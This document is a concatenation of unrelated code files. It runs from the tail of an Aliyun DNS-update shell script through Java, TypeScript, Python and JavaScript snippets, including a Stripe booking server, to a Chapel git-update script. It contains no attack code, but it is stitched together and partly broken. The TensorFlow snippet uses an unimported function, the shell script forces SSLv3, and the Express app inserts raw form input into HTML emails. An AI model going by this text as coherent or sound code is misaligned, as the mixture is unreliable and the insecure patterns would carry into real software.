reset_func_ret local sorted_key=$( i=0 while [ $i -lt ${g_pn} ] do eval key="\$g_pkey_$i" echo "${key}" i=$((++i)) done | LC_COLLATE=C sort ) local query_str="" for key in ${sorted_key} do eval val="\$g_pval_${key}" rawurl_encode "${key}" key_enc=${_func_ret} rawurl_encode "${val}" val_enc=${_func_ret} query_str="${query_str}${key_enc}=${val_enc}&" done query_str=${query_str%'&'} _debug Query String: ${query_str} # encode rawurl_encode "${query_str}" local encoded_str=${_func_ret} local str_to_signed="GET&%2F&"${encoded_str} _debug String to Signed: ${str_to_signed} local key_sign="${AccessKeySec}&" _func_ret=$(/bin/echo -n ${str_to_signed} | openssl dgst -binary -sha1 -hmac ${key_sign} | openssl enc -base64) } send_request() { # put signature calc_signature local signature=${_func_ret} put_param "Signature" "${signature}" # pack all params pack_params local packed_params=${_func_ret} local req_url="${ALiServerAddr}/?${packed_params}" _debug Request addr: ${req_url} local respond=$(curl -3 ${req_url} --silent --connect-timeout 10 -w "HttpCode:%{http_code}") echo ${respond} } describe_record() { put_params_public put_params_DescribeDomainRecords send_request } update_record() { # get ip get_my_ip local my_ip=${_func_ret} # Check if need update _debug My IP: ${my_ip} if [ -z "${my_ip}" ]; then _err Could not get my ip, exitting... exit fi get_domain_ip local domain_ip=${_func_ret} _debug Current Domain IP: ${domain_ip} if [ "${my_ip}" == "${domain_ip}" ]; then _log Need not to update, current IP: ${my_ip} exit fi # init params put_params_public put_params_UpdateDomainRecord ${my_ip} send_request } main() { describe_record #update_record } main
export function parseColor(str) { const ctx = document.createElement("canvas").getContext("2d"); ctx.fillStyle = str; return hexStringToColor(ctx.fillStyle); } export function hexStringToColor(hexString) { const hex = hexString.substr(1); return [ parseInt(hex.substring(0, 2), 16), parseInt(hex.substring(2, 4), 16), parseInt(hex.substring(4, 6), 16), parseInt(hex.substring(6, 8), 16) ]; }
package org.softuni.residentevil.domain.validation.annotations.composite.virus; import javax.validation.Constraint; import javax.validation.Payload; import javax.validation.constraints.NotBlank; import javax.validation.constraints.Size; import java.lang.annotation.Documented; import java.lang.annotation.Retention; import java.lang.annotation.Target; import static java.lang.annotation.ElementType.*; import static java.lang.annotation.RetentionPolicy.RUNTIME; /** * Description – Cannot be empty, should be between 5 and 100 symbols.<br> * Represented as Text in the database */ @NotBlank(message = "{virus.description.blank}") @Size(message = "{virus.description.length}", min = ValidVirusDescription.MIN_LENGTH, max = ValidVirusDescription.MAX_LENGTH) @Target({METHOD, FIELD, ANNOTATION_TYPE, CONSTRUCTOR, PARAMETER}) @Retention(RUNTIME) @Constraint(validatedBy = {}) @Documented public @interface ValidVirusDescription { int MIN_LENGTH = 5; int MAX_LENGTH = 100; String message() default ""; Class<?>[] groups() default {}; Class<? extends Payload>[] payload() default {}; }
#/bin/sh set -e mkdir build cd build cmake .. make
<reponame>plotter/platform2 import { inject } from 'aurelia-framework'; import { StateDirectory } from '../platform/state/state-directory'; import { StateRepository } from '../platform/state/state-repository'; import { PakDirectory } from '../platform/pak/pak-directory'; @inject(StateDirectory) export class NewSession { public hostId: string; public stateRepository: StateRepository; public pakDirectory: PakDirectory; constructor(private stateDirectory: StateDirectory) {} public activate(params) { let that = this; this.hostId = params.hostId; this.stateRepository = this.stateDirectory.getStateRepository(this.hostId); this.stateRepository.getPakDirectory() .then(pakDirectory => { that.pakDirectory = pakDirectory; that.pakDirectory.pakRepositories.forEach(pakRepo => { pakRepo.getPakList(); }); }); } }
# import necessary libraries import tensorflow as tf import pandas as pd # read in data data = pd.read_csv('spam_emails.csv') # create features and labels X = data.iloc[:, :-1] y = data.iloc[:, -1] # split into training, testing, validaton set X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42) # get the shape of the inputs n_features = X_train.shape[1] n_classes = len(y.unique()) # create the model model = tf.keras.Sequential() model.add(tf.keras.layers.Dense(64, input_shape=(n_features,), activation='relu')) model.add(tf.keras.layers.Dense(64, activation='relu')) model.add(tf.keras.layers.Dense(n_classes, activation='softmax')) # compile the model model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy']) # fit the model model.fit(X_train, y_train, epochs=10) # evaluate the model val_loss, val_acc = model.evaluate(X_test, y_test) print('Test accuracy:', val_acc)
import StoryChoice from './StoryChoice'; import { convertDelayTime } from 'utils'; import { STORY_TYPES } from 'hooks/DialogueManager/configs'; const { BREAKPOINT, BREAKPOINT_TRIGGER, BUG, END, INPUT, MESSAGE, MESSAGE_AFTER_BREAKPOINT, MESSAGE_AFTER_BREAKPOINT_NO_CHOICE, MESSAGE_WITH_PLACEHOLDER, MESSAGE_WITH_CHOICES, } = STORY_TYPES; export default class StoryScript { constructor({ ID, type, smsActionType, text, choices, delayMinutes, condition, nextID, }) { this.ID = ID; this.type = type; this.smsActionType = smsActionType; switch (type) { case BUG: case INPUT: case MESSAGE: case MESSAGE_WITH_PLACEHOLDER: case MESSAGE_AFTER_BREAKPOINT_NO_CHOICE: this.text = text; this.nextID = nextID; break; case BREAKPOINT: this.delayTime = convertDelayTime(delayMinutes); this.nextID = nextID; break; case BREAKPOINT_TRIGGER: this.condition = condition; this.nextID = nextID; break; case MESSAGE_AFTER_BREAKPOINT: case MESSAGE_WITH_CHOICES: this.text = text; this.choices = choices.map((choice) => new StoryChoice(choice)); break; case END: this.text = text; break; default: break; } } changeText(text) { this.text = text; } }
package aiss.controller; import java.io.IOException; import java.util.List; import java.util.logging.Level; import java.util.logging.Logger; import javax.servlet.RequestDispatcher; import javax.servlet.ServletException; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpSession; import aiss.model.igdb.Game; import aiss.resources.IGDBResource; public class MainServlet extends HttpServlet { private static final long serialVersionUID = 1L; private static final Logger log = Logger.getLogger(MainServlet.class.getName()); public MainServlet() { super(); } protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { HttpSession session = request.getSession(); eliminaSession(session); String id = request.getParameter("id"); session.setAttribute("servlet", "main"); log.log(Level.INFO, "MainServlet: The search game`s ID is: " + id); IGDBResource igdb = new IGDBResource(); List<Game> igdbResults = igdb.getGameId(id); RequestDispatcher rd = null; if(!(igdbResults == null)) { session.setAttribute("name", igdbResults.get(0).getName()); session.setAttribute("GAME", igdbResults.get(0).getName().replace(" ", "-")); session.setAttribute("amazon", igdbResults.get(0).getName().replace(" ", "+")); session.setAttribute("steam", igdbResults.get(0).getName().replace(" ", "+")); session.setAttribute("g2a", igdbResults.get(0).getName().replace(" ", "+")); if(igdbResults.get(0).getCover()==null) { session.setAttribute("img", "//i.imgur.com/aJBVL2V.png"); }else { session.setAttribute("img", igdbResults.get(0).getCover().getUrl().replace("thumb", "cover_big")); } if(igdbResults.get(0).getPegi()==null) { session.setAttribute("pegi", "No pegi"); }else { Integer pegii = igdbResults.get(0).getPegi().getRating(); session.setAttribute("pegi", Game.createPegi(pegii)); session.setAttribute("pegi2", igdbResults.get(0).getPegi().getRating()); } if(igdbResults.get(0).getGenres()==null) { session.setAttribute("genres", "No genre"); }else { List<Integer> generos = igdbResults.get(0).getGenres(); session.setAttribute("genres", Game.createGenre(generos)); session.setAttribute("recomm", generos); } if(igdbResults.get(0).getPlatforms()==null) { session.setAttribute("platform", "No platforms"); }else { List<Integer> plataformas = igdbResults.get(0).getPlatforms(); session.setAttribute("platform", Game.createPlatform(plataformas)); } if(igdbResults.get(0).getRating()==null) { session.setAttribute("rating", "No rating"); }else { session.setAttribute("rating", igdbResults.get(0).getRating().intValue()); } session.setAttribute("id", id); rd = request.getRequestDispatcher("/main.jsp"); }else { log.log(Level.SEVERE, "MainServlet: An error ocurred"); rd = request.getRequestDispatcher("/error.jsp"); } rd.forward(request, response); } protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { doGet(request, response); } private void eliminaSession(HttpSession session) { session.removeAttribute("name"); session.removeAttribute("GAME"); session.removeAttribute("amazon"); session.removeAttribute("steam"); session.removeAttribute("g2a"); session.removeAttribute("img"); session.removeAttribute("pegi"); session.removeAttribute("pegi2"); session.removeAttribute("genres"); session.removeAttribute("recomm"); session.removeAttribute("platform"); session.removeAttribute("rating"); session.removeAttribute("synopsis"); session.removeAttribute("id"); } }
def reverse_in_place(arr): start = 0 end = len(arr)-1 while start < end: arr[start], arr[end] = arr[end], arr[start] start += 1 end -= 1
<filename>app.js require("dotenv").config(); const express = require('express'); const stripe = require('stripe')(process.env.PROD_PRI_KEY); const bodyParser = require('body-parser'); const exphbs = require('express-handlebars'); const nodemailer = require('nodemailer'); const app = express(); // Handlebars Middleware app.engine('handlebars', exphbs({ defaultLayout: 'main' })); app.set('view engine', 'handlebars'); // Body Parser Middleware app.use(bodyParser.json()); app.use(bodyParser.urlencoded({ extended: false })); // Set Static Folder app.use(express.static(`${__dirname}/public`)); // Route Handling For Webpage app.get('/', (req, res) => { res.render('index'); }); app.get('/services', (req, res) => { res.render('services'); }); app.get('/about', (req, res) => { res.render('about'); }); app.get('/faq', (req, res) => { res.render('faq'); }); app.get('/contact', (req, res) => { res.render('contact'); }); app.get('/scheduler', (req, res) => { res.render('scheduler', { stripePublishableKey: process.env.PROD_PUB_KEY, }); }); // Charge Route app.post('/charge', (req, res) => { function makeid(length) { var result = ''; var characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; var charactersLength = characters.length; for ( var i = 0; i < length; i++ ) { result += characters.charAt(Math.floor(Math.random() * charactersLength)); } return result; } const confirmationID = makeid(12); const amount = 3500; const name = req.body.name const date = req.body.date const email = req.body.email const address = req.body.address const phone = req.body.phone const message = req.body.message stripe.customers .create({ email: req.body.stripeEmail, source: req.body.stripeToken, }) .then((customer) => stripe.charges.create({ amount, description: 'ScoopyDooCrew Cleanup', currency: 'usd', customer: customer.id, }) ) .then((charge) => res.render('success')) .then(() => { const emailCred = process.env.EMAIL_USERNAME const passCred = process.env.EMAIL_PASS const serviceCred = process.env.SERVICE_TYPE const outputScoopy = ` <p>You have an appointment that needs scheduled. Please call <strong>${name}</strong></p> <h3>Contact Details</h3> <ul> <li>Name: ${name}</li> <li>Scheduled Date: ${date}</li> <li>Email: ${email}</li> <li>Address: ${address}</li> <li>Phone: <a href="tel:${phone}">${phone}</a></li> <li>Customer Booking Confirmation ID: ${confirmationID} </li> </ul> <h3>Message</h3> <p>${message}</p> `; const outputCustomer = ` <h1>Thank you ${name} for scheduling your first service!</h1> <p>You can expect a phone call confirming your time slot of the selected date <strong>${date}</strong>.</p> <p>Your confirmation ID is <strong>${confirmationID}</strong></p> <h2><strong>Welcome To The Crew !</strong></h2> `; // create reusable transporter object using the default SMTP transport let transporter = nodemailer.createTransport({ service: serviceCred, auth: { user: emailCred, pass: passCred } }); // setup email data with unicode symbols // To Self let mailOptions = { from: emailCred, to: emailCred, subject: 'Appointment Scheduled From Website', text: 'Schedule Time Slot', html: outputScoopy }; // To Customer let mailOptionsCustomer = { from: emailCred, to: email, subject: 'ScoopyDooCrew Service Confirmation', text: 'Welcome To The Crew', html: outputCustomer }; // send mail with defined transport object to self transporter.sendMail(mailOptions, (error, info) => { if (error) { return console.log(error); } console.log('SELF |Message sent: %s', info.messageId); console.log('SELF |Preview URL: %s', nodemailer.getTestMessageUrl(info)); }); // Send confirmation mail to customer transporter.sendMail(mailOptionsCustomer, (error, info) => { if (error) { return console.log(error); } console.log('CUSTOMER |Message sent: %s', info.messageId); console.log('CUSTOMER |Preview URL: %s', nodemailer.getTestMessageUrl(info)); }); }) }); const port = process.env.PORT || 5000; app.listen(port, () => { console.log(`Server started on port ${port}`); });
#!/usr/bin/env bash # Update the Chapel git repository in each VM to master ./tryit.sh "cd chapel && git fetch origin --depth=1 && git checkout origin/master && GIT_PAGER=cat git log --oneline -n 1 && GIT_PAGER=cat git diff"